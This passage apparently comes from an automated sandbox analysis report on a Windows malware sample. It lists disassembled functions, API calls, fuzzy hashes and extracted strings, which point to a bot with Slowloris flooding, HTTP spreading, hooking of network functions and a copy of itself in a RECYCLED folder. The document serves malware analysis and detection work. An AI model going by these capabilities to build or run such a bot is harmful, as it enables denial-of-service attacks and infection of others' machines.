                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$memset$DriveLogicalSleepStrings_snprintflstrcatlstrlen
                                                                  • String ID: %0x.exe$30e44aa1$RECYCLED
                                                                  • API String ID: 530497602-684435549
                                                                  • Opcode ID: 0cfa70081205f2bb7b5b1627183ae57c4ab90c2d5b469cd82343f9c2e12f9893
                                                                  • Instruction ID: dc7a5fa392d0d149d72329117f2babda223c444661474c01379b6b2072300756
                                                                  • Opcode Fuzzy Hash: 0cfa70081205f2bb7b5b1627183ae57c4ab90c2d5b469cd82343f9c2e12f9893
                                                                  • Instruction Fuzzy Hash: D611C8B9940318BBD310AF65AC82BD5B678EB49704F50407BF604A21D1D7F859C48F9D
                                                                  Function 0036FC90 Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 57stringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036FCB0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036FCBD
                                                                  • _snprintf.MSVCRT ref: 0036FCE0
                                                                  • lstrcpyW.KERNEL32(003AB9A0,003AADA0), ref: 0036FCF2
                                                                  • lstrcpyA.KERNEL32(003ABDB0,RECYCLED), ref: 0036FD08
                                                                  • lstrcpyA.KERNEL32(003ABEB4,?), ref: 0036FD16
                                                                    • Part of subcall function 0036F9E0: memset.MSVCRT ref: 0036F9FF
                                                                    • Part of subcall function 0036F9E0: GetLogicalDriveStringsA.KERNEL32 ref: 0036FA22
                                                                    • Part of subcall function 0036F9E0: lstrcatA.KERNEL32(00000000,00373040), ref: 0036FA5C
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036FD61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$memset$DriveLogicalSleepStrings_snprintflstrcatlstrlen
                                                                  • String ID: %0x.exe$30e44aa1$RECYCLED
                                                                  • API String ID: 530497602-684435549
                                                                  • Opcode ID: 038bc5167953571c183dcd695717a34b9ccc95d2b8bf01a1a522f80f16c3dc47
                                                                  • Instruction ID: 34495751ad4c564055f3154d558ac0157d9077052543804f819e087ad413350a
                                                                  • Opcode Fuzzy Hash: 038bc5167953571c183dcd695717a34b9ccc95d2b8bf01a1a522f80f16c3dc47
                                                                  • Instruction Fuzzy Hash: 4111A7B2940218AFD323AF68AC82AE5B76CEB16700F448069F64856197D7F529C48F51
                                                                  Function 004089B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004089C5
                                                                  • AcquireCredentialsHandleW.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 00408A32
                                                                  • QueryContextAttributesW.SECUR32(?,00000004,00000001), ref: 00408AC3
                                                                  • InitializeSecurityContextW.SECUR32(?,00000000,?,0008C11C,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00408A79
                                                                    • Part of subcall function 00408760: FreeContextBuffer.SECUR32(?), ref: 00408774
                                                                    • Part of subcall function 00408790: InitializeSecurityContextW.SECUR32(?,?,?,0008C11C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 004088AE
                                                                  • DeleteSecurityContext.SECUR32(?), ref: 00408B17
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 00408B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Context$Security$CredentialsFreeHandleInitialize$AcquireAttributesBufferDeleteQuerymemset
                                                                  • String ID: $Microsoft Unified Security Protocol Provider
                                                                  • API String ID: 3657786480-3891800672
                                                                  • Opcode ID: af5bcdb1a2eef447009338cc511fe135db259d21b177dfce1ff198aca339893a
                                                                  • Instruction ID: beda717db611c482a8f93d0b8a0973b6a55a9a325cb36f24a7304a88d952abe4
                                                                  • Opcode Fuzzy Hash: af5bcdb1a2eef447009338cc511fe135db259d21b177dfce1ff198aca339893a
                                                                  • Instruction Fuzzy Hash: 605127B1D00208ABDB20DFAADD859EFFBF8FF94704F10452EE505E6251E7B4A6058B64
                                                                  Function 003689B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003689C5
                                                                  • AcquireCredentialsHandleW.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 00368A32
                                                                  • QueryContextAttributesW.SECUR32(?,00000004,00000001), ref: 00368AC3
                                                                  • InitializeSecurityContextW.SECUR32(?,00000000,?,0008C11C,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00368A79
                                                                    • Part of subcall function 00368760: FreeContextBuffer.SECUR32(?), ref: 00368774
                                                                    • Part of subcall function 00368790: InitializeSecurityContextW.SECUR32(?,?,?,0008C11C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 003688AE
                                                                  • DeleteSecurityContext.SECUR32(?), ref: 00368B17
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 00368B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Context$Security$CredentialsFreeHandleInitialize$AcquireAttributesBufferDeleteQuerymemset
                                                                  • String ID: $Microsoft Unified Security Protocol Provider
                                                                  • API String ID: 3657786480-3891800672
                                                                  • Opcode ID: 69a5bd4db19f190252c1b7c9026e36aed30769e0d2ebff970da068ee60dff6a9
                                                                  • Instruction ID: 862b6b74ed03e32e2e65e8d4b6987eb21d9028d2a6d32cf160adad4ce33bb399
                                                                  • Opcode Fuzzy Hash: 69a5bd4db19f190252c1b7c9026e36aed30769e0d2ebff970da068ee60dff6a9
                                                                  • Instruction Fuzzy Hash: A55118B1D00208ABDB21DF9ADC859AFFBFCFF98700F10851AE505E7215E7B4A6458B60
                                                                  Function 00401D10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00401D31
                                                                  • memset.MSVCRT ref: 00401D4B
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 00401D9B
                                                                  • strstr.MSVCRT ref: 00401DAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000400), ref: 00401DCA
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000200,00000000,00000000), ref: 00401E0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstr
                                                                  • String ID: bdns$block
                                                                  • API String ID: 1883446694-4143068083
                                                                  • Opcode ID: 0186ad86ad553c35ed268445183641265aed177f885356a13713a37939fdbb1b
                                                                  • Instruction ID: 02cb723c2acadd3014a6e1aa2f0b914f9df801f99115c0613e607c9dec7c965c
                                                                  • Opcode Fuzzy Hash: 0186ad86ad553c35ed268445183641265aed177f885356a13713a37939fdbb1b
                                                                  • Instruction Fuzzy Hash: 8B313A756403087BEB20DB55EC0AFEB736CDF84710F00416AFE14B62D1EAB4AE50C6A9
                                                                  Function 00361D10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00361D31
                                                                  • memset.MSVCRT ref: 00361D4B
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 00361D9B
                                                                  • strstr.MSVCRT ref: 00361DAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000400), ref: 00361DCA
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000200,00000000,00000000), ref: 00361E0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstr
                                                                  • String ID: bdns$block
                                                                  • API String ID: 1883446694-4143068083
                                                                  • Opcode ID: 94ed2e8dee14fc3d89270e3f1cb6dfb9ea20584cbe66336e81584b56e07710b2
                                                                  • Instruction ID: 997e66308cf864de44e392751d0634f1f44a958501c9d28c5c0193a85efd5a6f
                                                                  • Opcode Fuzzy Hash: 94ed2e8dee14fc3d89270e3f1cb6dfb9ea20584cbe66336e81584b56e07710b2
                                                                  • Instruction Fuzzy Hash: FF31E3B6640204BBEB32DA58DC06FFB736C9F84711F048159FE18AA1C5EAB59A10C6A1
                                                                  Function 00403B90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82pipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,00405182,?,?,?,00437AE8), ref: 00403BD8
                                                                  • CreateNamedPipeA.KERNEL32(?,40000001,00000000,000000FF,00010000,00010000,00000000,00000000), ref: 00403C0F
                                                                  • ConnectNamedPipe.KERNEL32(00000000,?,?,?,?,00405182,?,?,?,00437AE8), ref: 00403C25
                                                                  • GetLastError.KERNEL32(?,?,?,00405182,?,?,?,00437AE8), ref: 00403C2F
                                                                  • GetLastError.KERNEL32(?,?,?,00405182,?,?,?,00437AE8), ref: 00403C46
                                                                  • SetEvent.KERNEL32(00000000,?,?,?,00405182,?,?,?,00437AE8), ref: 00403C56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorEventLastNamedPipe$Connect
                                                                  • String ID: zC
                                                                  • API String ID: 3507186782-3727955402
                                                                  • Opcode ID: 37271feab1efd766603c5ed1eb9c75c67124974bf2be737a9f078a6ab44b23cc
                                                                  • Instruction ID: c73fd8eed312285066e6433c0d2a5033b489b0f8818e27d85342ab9d2f4f481c
                                                                  • Opcode Fuzzy Hash: 37271feab1efd766603c5ed1eb9c75c67124974bf2be737a9f078a6ab44b23cc
                                                                  • Instruction Fuzzy Hash: 5F21D8767442057BE7209F64DCC4BD6BB68EB44751F208536FB0DEA2D0D3B4E9408758
                                                                  Function 00363B90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82pipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,00365182,?,?,?,00397AE8), ref: 00363BD8
                                                                  • CreateNamedPipeA.KERNEL32(?,40000001,00000000,000000FF,00010000,00010000,00000000,00000000), ref: 00363C0F
                                                                  • ConnectNamedPipe.KERNEL32(00000000,?,?,?,?,00365182,?,?,?,00397AE8), ref: 00363C25
                                                                  • GetLastError.KERNEL32(?,?,?,00365182,?,?,?,00397AE8), ref: 00363C2F
                                                                  • GetLastError.KERNEL32(?,?,?,00365182,?,?,?,00397AE8), ref: 00363C46
                                                                  • SetEvent.KERNEL32(00000000,?,?,?,00365182,?,?,?,00397AE8), ref: 00363C56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorEventLastNamedPipe$Connect
                                                                  • String ID: z9
                                                                  • API String ID: 3507186782-1860472296
                                                                  • Opcode ID: 7a1c556f5c0f55d37dd537138dd2503d13cc638c9040fa02a23836268fb25f84
                                                                  • Instruction ID: 275ee4cfa44da5b8b31d5ec6a355ff446386184ccc2485dd96f7f5baaf69f2f1
                                                                  • Opcode Fuzzy Hash: 7a1c556f5c0f55d37dd537138dd2503d13cc638c9040fa02a23836268fb25f84
                                                                  • Instruction Fuzzy Hash: B621C576750206AFE7228F68DCC8B99BB68EF44761F208525FA1DDB180D7B1E9808B50
                                                                  Function 00401000 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 59stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcmpA.KERNEL32(?,0044AC50), ref: 0040100D
                                                                  • lstrcmpA.KERNEL32(?,0044AA28), ref: 00401054
                                                                  • MoveFileExA.KERNEL32 ref: 00401062
                                                                  • lstrcpyA.KERNEL32(00416D88,?), ref: 0040108B
                                                                  • lstrcpyA.KERNEL32(00416E90,?), ref: 00401093
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpy$FileMove_snprintflstrlenmemset
                                                                  • String ID: %s.%s$pdef$ruskill
                                                                  • API String ID: 4105673886-2574534833
                                                                  • Opcode ID: c6808c051f051d8e2374252726ea8595a063285eb58d62e8aeaf39ff97766995
                                                                  • Instruction ID: 4fe7375c48cb0ed1c8aec0ef7938256b6d24936e215c646bbef161c2785726af
                                                                  • Opcode Fuzzy Hash: c6808c051f051d8e2374252726ea8595a063285eb58d62e8aeaf39ff97766995
                                                                  • Instruction Fuzzy Hash: 0701F53678021477D3205B69AC49FDBB79CDB58764B140037FB08E26A1D678D880C27E
                                                                  Function 00361000 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 59stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcmpA.KERNEL32(?,003AAC50), ref: 0036100D
                                                                  • lstrcmpA.KERNEL32(?,003AAA28), ref: 00361054
                                                                  • MoveFileExA.KERNEL32 ref: 00361062
                                                                  • lstrcpyA.KERNEL32(00376D88,?), ref: 0036108B
                                                                  • lstrcpyA.KERNEL32(00376E90,?), ref: 00361093
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpy$FileMove_snprintflstrlenmemset
                                                                  • String ID: %s.%s$pdef$ruskill
                                                                  • API String ID: 4105673886-2574534833
                                                                  • Opcode ID: d5c8281d7d87af580f3dfbc646b4583b555b515a73af2078d66b7b237c6da99b
                                                                  • Instruction ID: 4ee66d274671f531af44d17fda274c931a6bf56f46f29c99618a47ebd3288f5f
                                                                  • Opcode Fuzzy Hash: d5c8281d7d87af580f3dfbc646b4583b555b515a73af2078d66b7b237c6da99b
                                                                  • Instruction Fuzzy Hash: D401247B3406007BEB335B6EAC4AEEBBB8CEF59760F488010F60CD6146D660C880C276
                                                                  Function 00409C60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 81stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strtok.MSVCRT ref: 00409C7C
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00409C9A
                                                                  • lstrcpyA.KERNEL32(0044B648,00411335), ref: 00409CB3
                                                                  • lstrcpynA.KERNEL32(0044B648,00000000,00000200), ref: 00409CC4
                                                                  • strtok.MSVCRT ref: 00409CDB
                                                                  • atoi.MSVCRT(00000000), ref: 00409CE8
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00409D73
                                                                  Strings
                                                                  • [Slowloris]: Finished flood on "%s", xrefs: 00409D45
                                                                  • [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 00409CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
                                                                  • String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
                                                                  • API String ID: 1726920797-1250431664
                                                                  • Opcode ID: 02698c9e1c9b5a337fd9f870c731ce9dae944a898e9a5d2947721506a0970c02
                                                                  • Instruction ID: 5abb1ecf655548da32f96995d5207bda4e63050bb647f4713687c5726d83be91
                                                                  • Opcode Fuzzy Hash: 02698c9e1c9b5a337fd9f870c731ce9dae944a898e9a5d2947721506a0970c02
                                                                  • Instruction Fuzzy Hash: 6C2198B6780704ABE310ABA5AC47FE7369CE754755F10403AF608A61D1D7BD98408BED
                                                                  Function 00369C60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 81stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strtok.MSVCRT ref: 00369C7C
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00369C9A
                                                                  • lstrcpyA.KERNEL32(003AB648,00371335), ref: 00369CB3
                                                                  • lstrcpynA.KERNEL32(003AB648,00000000,00000200), ref: 00369CC4
                                                                  • strtok.MSVCRT ref: 00369CDB
                                                                  • atoi.MSVCRT(00000000), ref: 00369CE8
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00369D73
                                                                  Strings
                                                                  • [Slowloris]: Finished flood on "%s", xrefs: 00369D45
                                                                  • [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 00369CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
                                                                  • String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
                                                                  • API String ID: 1726920797-1250431664
                                                                  • Opcode ID: a976d055c2555a0bfb93bda30f5910cfad1bad5bb9e827492efcad102436f466
                                                                  • Instruction ID: 80f12125437a035bbc888a026a5466e34fa7ab8de5038ad23ac400b455c8f862
                                                                  • Opcode Fuzzy Hash: a976d055c2555a0bfb93bda30f5910cfad1bad5bb9e827492efcad102436f466
                                                                  • Instruction Fuzzy Hash: 8321F673640B44ABE333ABA4AC4AFA77B9CE715711F048029F60C9A196C7F94840CBA0
                                                                  Function 00410BB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _stricmp.MSVCRT(?,GetAddrInfoW), ref: 00410C14
                                                                  • _stricmp.MSVCRT(?,send), ref: 00410C26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _stricmp
                                                                  • String ID: GetAddrInfoW$dnsapi.dll$nspr4.dll$send$wininet.dll
                                                                  • API String ID: 2884411883-3553644081
                                                                  • Opcode ID: 36e3ed33dabe1e89e10d8de8e0c2c552be30b71190476765e5e888efa949d741
                                                                  • Instruction ID: 7dd899092242fc79fd89890ffa549661517dd11cf2dee8623fb0997b335437d9
                                                                  • Opcode Fuzzy Hash: 36e3ed33dabe1e89e10d8de8e0c2c552be30b71190476765e5e888efa949d741
                                                                  • Instruction Fuzzy Hash: C3118633B41130629A2455A6AD01BDBA2485B60767F050237FD09E2381E5DDEAD195EE
                                                                  Function 00370BB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _stricmp.MSVCRT(?,GetAddrInfoW), ref: 00370C14
                                                                  • _stricmp.MSVCRT(?,send), ref: 00370C26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _stricmp
                                                                  • String ID: GetAddrInfoW$dnsapi.dll$nspr4.dll$send$wininet.dll
                                                                  • API String ID: 2884411883-3553644081
                                                                  • Opcode ID: f5d6fca3a01e2a73fe8874995bea9fd34b5ca5bee109a5c5c673ab68ea69a01b
                                                                  • Instruction ID: e2522f50e66a9bcbc7620da0db2159f771c19ba38962f64297c40d48e9d009a3
                                                                  • Opcode Fuzzy Hash: f5d6fca3a01e2a73fe8874995bea9fd34b5ca5bee109a5c5c673ab68ea69a01b
                                                                  • Instruction Fuzzy Hash: 25119833F41131919A3B55656D02BEBA2884B607B6F06C236FD0DDB241D59DDA50D1E2
                                                                  Function 0040C8C6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C8DD
                                                                  • lstrlenA.KERNEL32(?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C8E5
                                                                  • lstrcatA.KERNEL32(00000000,00412C78,?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0), ref: 0040C907
                                                                  • lstrcatA.KERNEL32(00000000,?,?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0), ref: 0040C913
                                                                  • lstrcmpA.KERNEL32(00000000,http.int,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C985
                                                                  • atoi.MSVCRT(?,?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C99C
                                                                  • atoi.MSVCRT(00000000), ref: 0040C9AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: atoilstrcatlstrlen$lstrcmp
                                                                  • String ID: [HTTP]: Updated HTTP spread message to "%s"$http$msg
                                                                  • API String ID: 3861295430-3390247340
                                                                  • Opcode ID: cd66be1e72c6cf93dfedc839c2d5169449ca9746f87a431d2b3f8e4c18d29906
                                                                  • Instruction ID: 1ab7614cfbc0b4fce2ff95c09ce7119ec81f183615a4560a58167f2487451b67
                                                                  • Opcode Fuzzy Hash: cd66be1e72c6cf93dfedc839c2d5169449ca9746f87a431d2b3f8e4c18d29906
                                                                  • Instruction Fuzzy Hash: 6601657594020CAADB20DF60CC81EDAB378AF44304F2045ABD549A3192DB78FA86CF65
                                                                  Function 0036C8C6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C8DD
                                                                  • lstrlenA.KERNEL32(?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C8E5
                                                                  • lstrcatA.KERNEL32(00000000,00372C78,?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0), ref: 0036C907
                                                                  • lstrcatA.KERNEL32(00000000,?,?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0), ref: 0036C913
                                                                  • lstrcmpA.KERNEL32(00000000,http.int,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C985
                                                                  • atoi.MSVCRT(?,?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C99C
                                                                  • atoi.MSVCRT(00000000), ref: 0036C9AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: atoilstrcatlstrlen$lstrcmp
                                                                  • String ID: [HTTP]: Updated HTTP spread message to "%s"$http$msg
                                                                  • API String ID: 3861295430-3390247340
                                                                  • Opcode ID: 56f157eac6543f671bacc2f6778bda34c2ca0a1f7b0f656f79cb90cf0ed21ec3
                                                                  • Instruction ID: 36e996ee51aab6251366d927034dab49032befccbff6b351b796ab7ab9ed0a8f
                                                                  • Opcode Fuzzy Hash: 56f157eac6543f671bacc2f6778bda34c2ca0a1f7b0f656f79cb90cf0ed21ec3
                                                                  • Instruction Fuzzy Hash: 78016175A1420C9EDB32DF60CC81EEAB378AF44704F11849AE58DA7046DB74FA86CF61
                                                                  Function 00403DB8 Relevance: 12.1, APIs: 8, Instructions: 108fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00417960,00000800,00000000), ref: 00403DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403E3E
                                                                  • ReadFile.KERNEL32(?,00417960,00000800,00000000,?), ref: 00403ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00403F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: 48b095c9934a17c5a57d935e29c9e11065415f2b5555cb5260d4dacb11bb4326
                                                                  • Instruction ID: 1449663287717f94bd81a238159e52aac75588b2a5b986027c9b27bc7671b927
                                                                  • Opcode Fuzzy Hash: 48b095c9934a17c5a57d935e29c9e11065415f2b5555cb5260d4dacb11bb4326
                                                                  • Instruction Fuzzy Hash: 1541D1B4600219AFE710CF68DCC4FAA7BA8FF49304F408668E64597391C731EA11CBA9
                                                                  Function 00363DB8 Relevance: 12.1, APIs: 8, Instructions: 108fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00377960,00000800,00000000), ref: 00363DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363E3E
                                                                  • ReadFile.KERNEL32(?,00377960,00000800,00000000,?), ref: 00363ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00363F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363F1D
                                                                  Memory Dump Source
